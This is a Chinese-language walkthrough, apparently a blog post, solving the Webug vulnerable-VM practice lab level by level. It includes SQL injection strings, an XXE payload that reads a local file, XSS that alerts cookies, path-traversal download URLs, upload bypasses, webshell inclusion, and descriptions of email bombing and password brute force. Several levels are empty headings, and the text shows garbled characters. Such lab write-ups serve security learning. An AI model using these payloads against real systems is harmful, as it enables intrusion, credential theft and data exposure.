Webug官網(wǎng):http://www.webug.org
一個不錯的靶機酝惧,可以直接下載server2003虛擬機沈善,即可直接打靶:
第一關:顯錯注入
用’會報錯:
url:id=3' UNION SELECT 1,flag FROM flag where flag.id=1 %23
第二關:布爾注入
單引號:url?id=1' and length(user())>15 --+
第三關:延時注入
單引號:url?id=1' and sleep(1) --+,?頁面有明顯的延遲
第四關:Post注入
搜索引號’ 出現(xiàn)報錯頁面
搜索:' or sleep(3) ?#??延時打開成功百新!
第五關:過濾注入(同上)
第六關:寬字節(jié)注入
寬字節(jié)注入原理即是利用編碼轉(zhuǎn)換企软,將服務器端強制添加的本來用于轉(zhuǎn)義的\符號吃掉,從而能使攻擊者輸入的引號起到閉合作用饭望,以至于可以進行SQL注入仗哨。
url?id=1%df',出現(xiàn)錯誤了
第七關:xxe注入
Payload為:data=
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "file:///c:/passwd">]>
<root>
發(fā)現(xiàn)不行铅辞,將payload進行url編碼:
第八關:csv注入
第九關:反射型xss
第十關:存儲型xss
提交內(nèi)容為:alert(document.cookie)<script>alert(document.cookie)</script>
第十一關:萬能密碼登錄
嘗試‘or 1=1 #,成功囤踩!
第十二關:DOM型XSS
在搜索框輸入:" required="">alert(document.cookie)<script>alert(document.cookie)</script><name=",將value閉合旨椒。
第十三關:過濾XSS
第十四關:鏈接注入
第十五關:任意文件下載
http://10.254.254.129/control/filedownload/file_download.php?file=template/../../../boot.ini
第十六關:mysql配置文件下載
http://10.254.254.129/control/filedownload/ini_file_download.php?file=../mysql/my.ini
第十七關:文件上傳(前端攔截)
將jpg后綴修改為php堵漱;
第十八關:文件上傳(解析漏洞)
服務端調(diào)整成php-5.3.29-nts+Nginx
利用nginx的解析漏洞訪問:
第十九關:文件上傳(畸形文件)
將1.jpg修改成1.pphphp
第二十關:文件上傳(截斷上傳)
將php切換到小于5.3.4的版本 并把magic_quotes_gpc改為off综慎,00%還是失敗:
把alert('error')改為$file_ext勤庐,嘗試了%00截斷示惊,發(fā)現(xiàn)彈出的是.php而不是.jpg 因此截斷失敗愉镰;
第二十一關:文件上傳(htaccess)
上傳htaccess:
上傳test文件:
訪問:http://10.254.254.129/template/upload/test
第二十二關:越權修改密碼
使用錯誤密碼也能成功修改aaaaa賬戶密碼,沒有對賬戶的舊密碼進行正誤判斷米罚。令id=1,輸入錯誤舊密碼111111和新密碼222222丈探,可將admin用戶密碼成功修改為222222录择。
第二十三關:支付漏洞
第二十四關:郵箱轟炸
思路是用burpsuit抓取注冊信息,然后在intruder模塊中設置發(fā)送數(shù)量碗降,和郵箱地址隘竭,即可形成郵箱轟炸。
第二十五關:越權查看admin
第二十六關:URL跳轉(zhuǎn)
http://10.254.254.129/control/more/url_redirect.php?url=https://www.baidu.com
第二十七關:文件包含漏洞
執(zhí)行我們上傳的webshell:
http://10.254.254.129/control/more/file_include.php?filename=../../template/upload/shell.php
第二十八關:命令執(zhí)行
切換版本至php-5.4.45 + Apache遗锣,再次訪問:
然而沒發(fā)現(xiàn)货裹??精偿?弧圆?請師傅指點!笔咽!
第二十九關:Webshell爆破
對口令進行爆破:
密碼為a1,登錄成功:
第四十關:Ssrf
探測內(nèi)網(wǎng)機器80端口的服務
結語:
??? 剛好刷完了整個靶機搔预,跟各位師傅分享討論一下,多多指點叶组!